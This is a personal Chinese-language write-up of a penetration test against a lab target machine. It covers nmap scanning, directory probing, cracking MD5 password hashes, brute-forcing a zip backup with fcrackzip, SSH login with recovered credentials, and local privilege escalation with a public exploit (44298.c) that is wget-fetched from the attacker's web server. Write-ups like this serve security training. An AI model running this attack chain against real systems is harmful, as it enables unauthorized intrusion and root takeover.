文章记录了一次渗透测试的过程,包括主机发现、端口扫描、目录探测、MD5密码解密、Base64解码、暴力破解以及最终的提权和漏洞利用。
个人笔记,稍有瑕疵,中途 kali 和 靶机IP 有所改变,总体无影响,介意误入
信息搜集
- 主机发现
查看当前网段
ip a
扫描网段,发现靶机IP
nmap -sP -T4 10.4.7.0/24
- 端口扫描
nmap -A -p- 10.4.7.132
- 扫描版本信息
nmap -sV -p 22,3000 10.4.7.132
扫描结果发现靶机开启了22 ssh端口和3000端口,且3000端口开放的是http服务。
- 目录扫描
dirb http://10.4.7.132:3000/ -f
因为http服务使用的是3000端口,不是默认的80端口,所以在进行目录探测时,需使用参数 ’ -f ’ 进行微调。
继续扫描刚发现的文件
dirb http://10.4.7.132:3000/usr/share/dirb/wordlists/common.txt -f
接连进行两次目录扫描,都没发现什么可用的目录,
- 接下来对目标主机的网站进行访问,查找信息
访问结果如下:
发现一个可以进行登录的网页,尝试进行使用弱口令admin,admin等尝试多次登录,登录失败。
- F12 查看网页源码
在js文件中发现了可疑的信息,疑似目录,可以尝试进行访问
访问后:
发现一些用户名和加密的密码,
该密码是由MD5进行加密的,可以在MD5解密网站进行解密,以下是解密结果:
| 用户名 | 密码 |
|---|---|
| tom | spongebob |
| mark | snowflake |
| restating | 未找到密码 |
- 尝试进行登录
分别使用tom、mark用户名进行登录,没有发现什么有用信息,只告诉我们 " 目前只有管理员用户可以访问控制面板,但请尽快检查以测试标准用户功能! "。登录进去后的页面如下图所示。此时,需另谋出路。
在http://10.4.7.132:3000/api/users/latest这条链接中,单词“latest”表示最新的,去掉“latest”尝试进行访问,说不定会有意想不到的收获。访问10.4.7.132:3000/api/users,发现得到了另外一个用户。
解密后得到:
| 用户名 | 密码 |
|---|---|
| myP14ceAdm1nAcc0uNT | manchester |
尝试进行登录,登录成功,发现可以下载网站备份,然后进行下载
下载后的文件
进行查看网站备份文件
由于输出内容中末尾还有 ’ = ',所以该文件为Base64编码。
base64编码特征:
标准base64只有64个字符(英文大小写、数字和+、/)以及用作后缀等号;
等号一定用作后缀,且数目一定是0个、1个或2个。这是因为如果原文长度不能被3整除,base64要在后面添加\0凑齐3n位。为了正确还原,添加了几个\0就加上几个等号。显然添加等号的数目只能是0、1或2;
将会把 myplace.backup 文件中的base64编码的内容解码,并将解码后的内容写入到 myplace.zip 文件中。
base64 -d myplace.backup > myplace.zip
在linux中,一切都是文件。mypalce.zip的后缀名只是方便管理员去管理。
在进行解压时发现还需要密码,我们并不知道密码
可以进行密码爆破
在这里使用卡里自带的工具 fcrackzip 进行破解,下方是此工具的一些参数
-f, --file <zipfile>:指定要破解的zip文件路径。
-D, --dictionary <dictfile>:指定密码字典文件的路径。
-b, --brute-force:使用暴力破解模式。
-c, --charset <charset>:指定字符集,常见的选项包括a(小写字母)、A(大写字母)、0(数字)、!(特殊字符)等。您可以根据需要自定义字符集。
-p, --init-password <password>:指定初始密码进行尝试。
-u, --use-unzip:使用unzip命令检查猜测的密码是否正确。
-l, --length <min_length>:<max_length>:指定密码的最小和最大长度范围。
-q, --quiet:静默模式,减少输出信息。
-v, --verbose:详细模式,显示更多输出信息。
-m, --method <method>:指定破解方法,常见的选项有zip2和zip3。
-n, --num-threads <threads>:指定使用的线程数。
-p, --<password>:要尝试的初始密码。
使用命令
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip
爆破得到密码: magicword
继续解压文件
解压完成后直接在当前路径下(桌面)生成一个var文件。
-
查看var文件,
在var/www/myplace/目录下的app.js中发现了貌似有用的信息
这个mongodb实例指向localhost,这些凭证很可能也适合ssh访问,尝试一下。
ssh mark@10.4.7.132 密码:5AYRft73VtFpc84k注:因不可抗因素,靶机和 kali IP 发生改变
原IP:
靶机IP:10.4.7.132
kali IP:10.4.7.133
现IP:
靶机IP:10.9.47.106
kali ip:10.9.47.209
接下来将使用现在IP继续进行操作继续尝试 ssh 连接
ssh mark@10.9.47.106 密码:5AYRft73VtFpc84k成功连接
尝试提权
-
尝试进行 sudo 提权,发现并不能使用sudo
-
尝试本地提权
在Kali攻击机上查找和靶机相关的漏洞,找到一个本地提权漏洞,
-
下载漏洞到本地
searchsploit -m 44298.c
-
开启一个网站,在靶机中远程下载该文件
python3 -m http.server 80
先进入 /tmp 目录下
由于 /tmp文件的限制小,能够将文件写入,所以将文件上传到靶机的tmp文件下。远程下载:
wget http://10.9.47.209/44298.c
-
对文件进行编译:
gcc 44298.c -o exp
-
对编译好的文件进行赋权
chmod 777 exp
-
执行后提权成功
./exp
扫一扫
915
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
